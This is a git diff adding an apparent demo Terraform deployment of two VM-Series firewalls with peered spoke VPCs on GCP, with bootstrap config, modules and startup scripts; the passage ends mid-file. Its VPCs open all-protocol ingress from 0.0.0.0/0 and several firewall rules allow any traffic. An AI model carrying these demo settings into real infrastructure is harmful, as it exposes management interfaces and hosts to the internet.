c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1 yes no - no + yes no - vm-series 8.8.8.8 4.2.2.2 + mgmt-interface-swap
@@ -489,20 +481,13 @@ DO NOT USE FOR PRODUCTION - + ethernet1/2 - - - - ethernet1/3 - - - @@ -555,7 +540,7 @@ DO NOT USE FOR PRODUCTION ping - application-default + any any @@ -564,9 +549,9 @@ DO NOT USE FOR PRODUCTION yes allow - + - web-zone + trust-zone untrust-zone @@ -588,6 +573,7 @@ DO NOT USE FOR PRODUCTION service-http + service-https any @@ -595,13 +581,10 @@ DO NOT USE FOR PRODUCTION yes yes allow - Required to access web-server over the VM-Series untrust interface's elastic/public IP address. - - + - db-zone - web-zone + trust-zone untrust-zone @@ -619,12 +602,10 @@ DO NOT USE FOR PRODUCTION any - ping ssh - service-tcp-221 - service-tcp-222 + any any @@ -635,13 +616,12 @@ DO NOT USE FOR PRODUCTION no If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. - + - untrust-zone + trust-zone - db-zone - web-zone + trust-zone any @@ -659,7 +639,7 @@ DO NOT USE FOR PRODUCTION any - application-default + any any @@ -667,20 +647,19 @@ DO NOT USE FOR PRODUCTION yes yes allow - This rule is required so the web-server and db-server can bootstrap with Apache and mysql for the demo. - + - db-zone + untrust-zone - web-zone + trust-zone - web-server + any - db-server + any any @@ -689,7 +668,7 @@ DO NOT USE FOR PRODUCTION any - mysql + any application-default @@ -700,23 +679,12 @@ DO NOT USE FOR PRODUCTION yes yes allow - - - - Test Drive - - - - - - web-server - 22 - + @@ -734,20 +702,22 @@ DO NOT USE FOR PRODUCTION any - 10.5.1.4 + any - service-tcp-221 + service-http ipv4 + no + + spoke1-intlb + 80 + + ethernet1/1 - - - db-server - 22 - + - ethernet1/3 + ethernet1/2 @@ -761,17 +731,17 @@ DO NOT USE FOR PRODUCTION any - 10.5.1.4 + any - service-tcp-222 + service-tcp-221 ipv4 - no + + spoke1-vm + 22 + + ethernet1/1 - - - web-server - 80 - + @@ -789,13 +759,40 @@ DO NOT USE FOR PRODUCTION any - 10.5.1.4 + any - service-http + service-tcp-222 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + trust-zone + + + trust-zone + + + any + + + any + + any ipv4 - no - + @@ -807,7 +804,7 @@ DO NOT USE FOR PRODUCTION untrust-zone - any + trust-zone any @@ -824,7 +821,12 @@ DO NOT USE FOR PRODUCTION deny - yes + no + yes + + + deny + no yes @@ -955,16 +957,40 @@ DO NOT USE FOR PRODUCTION
- - 10.5.2.5 + + 10.10.2.2 - web + spoke2-vpc - - 10.5.3.5 + + 10.10.1.2 - database + spoke1-vpc + + + + 10.10.1.0/24 + + spoke1-vpc + + + + 10.10.2.0/24 + + spoke2-vpc + + + + 192.168.1.2 + + + 192.168.1.3 + + + 10.10.1.100 + + spoke1-vpc
@@ -973,27 +999,24 @@ DO NOT USE FOR PRODUCTION ethernet1/1 ethernet1/2 - ethernet1/3 - - color13 + + color3 - - color15 + + color24 - color19 - - - color17 + color20 - - color6 + + color13 +
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/guide.pdf b/gcp/adv_peering_2fw_2spoke/guide.pdf new file mode 100644 index 00000000..227722c9 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/guide.pdf differ diff --git a/gcp/adv_peering_2fw_2spoke/images/diagram.png b/gcp/adv_peering_2fw_2spoke/images/diagram.png new file mode 100644 index 00000000..8ba1308e Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/diagram.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/directory.png b/gcp/adv_peering_2fw_2spoke/images/directory.png new file mode 100644 index 00000000..b45b470e Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/directory.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/peering.png b/gcp/adv_peering_2fw_2spoke/images/peering.png new file mode 100644 index 00000000..057ac136 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/peering.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/routes.png b/gcp/adv_peering_2fw_2spoke/images/routes.png new file mode 100644 index 00000000..d6fb5d4a Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/routes.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/web.png b/gcp/adv_peering_2fw_2spoke/images/web.png new file mode 100644 index 00000000..ae0534d5 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/web.png differ diff --git a/gcp/adv_peering_2fw_2spoke/main.tf b/gcp/adv_peering_2fw_2spoke/main.tf new file mode 100644 index 00000000..c0bf8e83 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/main.tf @@ -0,0 +1,136 @@ +provider "google" { + credentials = "${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" +} + +#************************************************************************************ +# CREATE VPCS - MGMT, UNTRUST, TRUST +#************************************************************************************ +module "vpc_mgmt" { + source = "./modules/create_vpc/" + vpc_name = "mgmt-vpc" + subnetworks = ["mgmt-subnet"] + ip_cidrs = ["192.168.0.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_untrust" { + source = "./modules/create_vpc/" + vpc_name = "untrust-vpc" + subnetworks = ["untrust-subnet"] + ip_cidrs = ["192.168.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/create_vpc/" + vpc_name = "trust-vpc" + subnetworks = ["trust-subnet"] + ip_cidrs = ["192.168.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP +#************************************************************************************ +module "bootstrap" { + source = "./modules/create_bootstrap_bucket/" + bucket_name = "vmseries-adv-peering" + randomize_bucket_name = true + file_location = 
"bootstrap_files/" + + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) +#************************************************************************************ +module "vm_fw" { + source = "./modules/create_vmseries/" + fw_names = ["vmseries01", "vmseries02"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"] + + fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.0.2", "192.168.0.3"] + fw_nic2_ip = ["192.168.2.2", "192.168.2.3"] + + fw_bootstrap_bucket = "${module.bootstrap.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group" + + dependencies = [ + "${module.bootstrap.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER +#************************************************************************************ +module "vmseries_public_lb" { + source = "./modules/create_public_lb/" + name = "vmseries-lb" + + backends = { + "0" = [ + { + group = "${module.vm_fw.instance_group[0]}" + }, + { + group = "${module.vm_fw.instance_group[1]}" + }, + ] + } + + backend_params = [ + "/,http,80,10", // health check path, port name, port number, timeout seconds. 
+ ] +} + +#************************************************************************************ +# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2 +#************************************************************************************ +resource "google_compute_route" "default" { + count = "${length(module.vm_fw.fw_names)}" + name = "default-to-${module.vm_fw.fw_names[count.index]}" + dest_range = "0.0.0.0/0" + network = "${module.vpc_trust.vpc_self_link}" + next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}" + priority = 100 +} + +#************************************************************************************ +# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2 +#************************************************************************************ +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "trust-to-spoke1" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke1.vpc_self_link}" +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "trust-to-spoke2" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke2.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.trust_to_spoke1", + ] +} diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf new file mode 100644 index 00000000..bfe60b19 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf @@ -0,0 +1,120 @@ +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${length(var.config) > 0 ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${length(var.content) > 0 ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${length(var.license) > 0 ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${length(var.software) > 0 ? 
length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${length(var.config) == 0 ? 1 : 0 }" + name = "config/" + content = "config/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${length(var.content) == 0 ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${length(var.license) == 0 ? 1 : 0 }" + name = "license/" + content = "license/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${length(var.software) == 0 ? 1 : 0 }" + name = "software/" + content = "software/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${google_storage_bucket.bootstrap.name}" +} diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf new file mode 100644 index 00000000..961faca1 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf @@ -0,0 +1,168 @@ + +variable project { + description = "The project to deploy to, if not set the default provider project is used." + default = "" +} + +variable ip_version { + description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4" + default = "" +} + +variable name { + description = "Name for the forwarding rule and prefix for supporting resources" +} + +variable backends { + description = "Map backend indices to list of backend maps." + type = "map" +} + +variable backend_params { + description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds" + type = "list" +} + +variable backend_protocol { + description = "The protocol with which to talk to the backend service" + default = "HTTP" +} + +variable create_url_map { + description = "Set to `false` if url_map variable is provided." + default = true +} + +variable url_map { + description = "The url_map resource to use. Default is to send all traffic to first backend." + default = "" +} + +variable http_forward { + description = "Set to `false` to disable HTTP port 80 forward" + default = true +} + +variable ssl { + description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs" + default = false +} + +variable private_key { + description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable certificate { + description = "Content of the SSL certificate. 
Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable use_ssl_certificates { + description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`" + default = false +} + +variable ssl_certificates { + type = "list" + description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided." + default = [] +} + +variable security_policy { + description = "The resource URL for the security policy to associate with the backend service" + default = "" +} + +variable cdn { + description = "Set to `true` to enable cdn on backend." + default = "false" +} + + +resource "google_compute_global_forwarding_rule" "http" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}" + target = "${google_compute_target_http_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "80" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_forwarding_rule" "https" { + project = "${var.project}" + count = "${var.ssl ? 1 : 0}" + name = "${var.name}-https" + target = "${google_compute_target_https_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "443" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_address" "default" { + project = "${var.project}" + name = "${var.name}-address" + ip_version = "${var.ip_version}" +} + +# HTTP proxy when ssl is false +resource "google_compute_target_http_proxy" "default" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}-http-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" +} + +# HTTPS proxy when ssl is true +resource "google_compute_target_https_proxy" "default" { + project = "${var.project}" + count = "${var.ssl ? 1 : 0}" + name = "${var.name}-https-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" + ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"] +} + +resource "google_compute_ssl_certificate" "default" { + project = "${var.project}" + count = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}" + name_prefix = "${var.name}-certificate-" + private_key = "${var.private_key}" + certificate = "${var.certificate}" + + lifecycle = { + create_before_destroy = true + } +} + +resource "google_compute_url_map" "default" { + project = "${var.project}" + count = "${var.create_url_map ? 
1 : 0}" + name = "${var.name}" + default_service = "${google_compute_backend_service.default.0.self_link}" +} + +resource "google_compute_backend_service" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-backend-${count.index}" + port_name = "${element(split(",", element(var.backend_params, count.index)), 1)}" + protocol = "${var.backend_protocol}" + timeout_sec = "${element(split(",", element(var.backend_params, count.index)), 3)}" + backend = ["${var.backends["${count.index}"]}"] + health_checks = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"] + security_policy = "${var.security_policy}" + enable_cdn = "${var.cdn}" +} + +resource "google_compute_http_health_check" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-check-${count.index}" + request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}" + port = "${element(split(",", element(var.backend_params, count.index)), 2)}" +} + +output "address" { + value = "${google_compute_global_address.default.address}" +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf new file mode 100644 index 00000000..dd140b46 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf @@ -0,0 +1,127 @@ +variable vm_names { + type = "list" +} +variable vm_machine_type {} +variable vm_zones { + type = "list" +} +variable vm_ssh_key {} + +variable vm_image {} +variable vm_subnetworks { + type = "list" +} + +variable vm_scopes { + type = "list" + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + + +variable internal_lb_create { + default = false +} + +variable "internal_lb_health_check" { + default = "22" +} + +variable "internal_lb_ports" { + type = "list" + default = ["80"] +} + +variable "internal_lb_name" { + default = "intlb" +} + +variable "internal_lb_ip" { + default = "" +} + +variable create_instance_group { + default = false +} + +variable startup_script { +default = "" +} + + +resource "google_compute_instance" "vm" { + count = "${length(var.vm_names)}" + name = "${element(var.vm_names, count.index)}" + machine_type = "${var.vm_machine_type}" + zone = "${element(var.vm_zones, count.index)}" + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = "${var.startup_script}" + + + metadata { + serial-port-enable = true + sshKeys = "${var.vm_ssh_key}" + } + + network_interface { + subnetwork = "${element(var.vm_subnetworks, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.vm_image}" + } + } + + service_account { + scopes = "${var.vm_scopes}" + } +} + +resource "google_compute_instance_group" "instance_group" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-group" + zone = "${var.vm_zones[0]}" + + instances = [ + "${google_compute_instance.vm.*.self_link}", + ] +} + + + + +resource "google_compute_health_check" "health_check" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-check-${count.index}" + + tcp_health_check { + port = "${var.internal_lb_ports[0]}" + } +} + +resource "google_compute_region_backend_service" "backend_service" { + count = "${var.internal_lb_create}" + name = 
"${var.internal_lb_name}-backend-${count.index}" + health_checks = ["${google_compute_health_check.health_check.self_link}"] + + backend { + group = "${google_compute_instance_group.instance_group.self_link}" + } +} + + +resource "google_compute_forwarding_rule" "forwarding_rule" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-tcp" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lb_ip}" + ports = "${var.internal_lb_ports}" + subnetwork = "${var.vm_subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service.self_link}" +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf new file mode 100644 index 00000000..8a87285a --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf @@ -0,0 +1,176 @@ +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = "list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${length(var.fw_names)}" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + access_config = {} + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + 
+#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group) ? length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] + + named_port { + name = "http" + port = "80" + } +} + + + + + + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${google_compute_instance_group.vmseries.*.self_link}" +} + + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf new file mode 100644 index 00000000..e4511595 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf @@ -0,0 +1,71 @@ +variable vpc_name {} + +variable subnetworks { + type = "list" +} + +variable ip_cidrs { + type = "list" +} + +variable regions { + type = "list" +} + +variable ingress_allow_all { + default = true +} + +variable ingress_sources { + type = "list" + default = ["0.0.0.0/0"] +} + +resource "google_compute_network" "default" { + name = "${var.vpc_name}" + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = "${length(var.subnetworks)}" + name = "${element(var.subnetworks, count.index)}" + ip_cidr_range = "${element(var.ip_cidrs, count.index)}" + region = "${element(var.regions, count.index)}" + network = "${google_compute_network.default.self_link}" +} + +resource "google_compute_firewall" "ingress_all" { + count = "${var.ingress_allow_all}" + name = "${google_compute_network.default.name}-ingress-all" + network = "${google_compute_network.default.self_link}" + direction = "INGRESS" + source_ranges = "${var.ingress_sources}" + + allow { + protocol = "all" + } +} + +output "subnetwork_id" { + value = "${google_compute_subnetwork.default.*.id}" +} + +output "subnetwork_name" { + value = "${google_compute_subnetwork.default.*.name}" +} + +output "subnetwork_self_link" { + value = "${google_compute_subnetwork.default.*.self_link}" +} + +output "vpc_name" { + value = "${google_compute_network.default.*.name}" +} + +output "vpc_id" { + value = "${google_compute_network.default.*.id[0]}" +} + +output "vpc_self_link" { + value = "${google_compute_network.default.*.self_link[0]}" +} diff --git a/gcp/adv_peering_2fw_2spoke/outputs.tf b/gcp/adv_peering_2fw_2spoke/outputs.tf new file mode 100644 index 00000000..dec2a032 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/outputs.tf @@ -0,0 +1,37 @@ +#************************************************************************************ +# OUTPUTS +#************************************************************************************ +output " IMPORTANT!! PLEASE READ!! 
" { + value = [ + "===================================================================================", + "Before proceeding, you must enable import/export custom routes on all peering links", + "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs", + "==================================================================================="] +} +output "GLB-ADDRESS " { + value = "http://${module.vmseries_public_lb.address}" +} + +output "MGMT-URL-FW1 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[0]}" +} + +output "MGMT-URL-FW2 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[1]}" +} + +output "SSH-SPOKE1-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i " +} + +output "SSH-SPOKE2-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i " +} + +output "SSH-SPOKE1-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i " +} + +output "SSH-SPOKE2-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i " +} diff --git a/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh new file mode 100644 index 00000000..1349754f --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh @@ -0,0 +1,7 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2 php7. libapache2-mod-php7.; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done diff --git a/gcp/adv_peering_2fw_2spoke/spoke1.tf b/gcp/adv_peering_2fw_2spoke/spoke1.tf new file mode 100644 index 00000000..fbbe81ec --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/spoke1.tf @@ -0,0 +1,61 @@ +provider "google" { + credentials = "${var.spoke1_project_authfile}" + project = "${var.spoke1_project}" + region = "${var.region}" + alias = "spoke1" +} + +#************************************************************************************ +# CREATE SPOKE2 VPC & SPOKE1 VMs (w/ INTLB) +#************************************************************************************ +module "vpc_spoke1" { + source = "./modules/create_vpc/" + vpc_name = "spoke1-vpc" + subnetworks = ["spoke1-subnet"] + ip_cidrs = ["10.10.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke1" + } +} + +module "vm_spoke1" { + source = "./modules/create_vm/" + vm_names = ["spoke1-vm1", "spoke1-vm2"] + vm_zones = ["${var.region}-a", "${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = 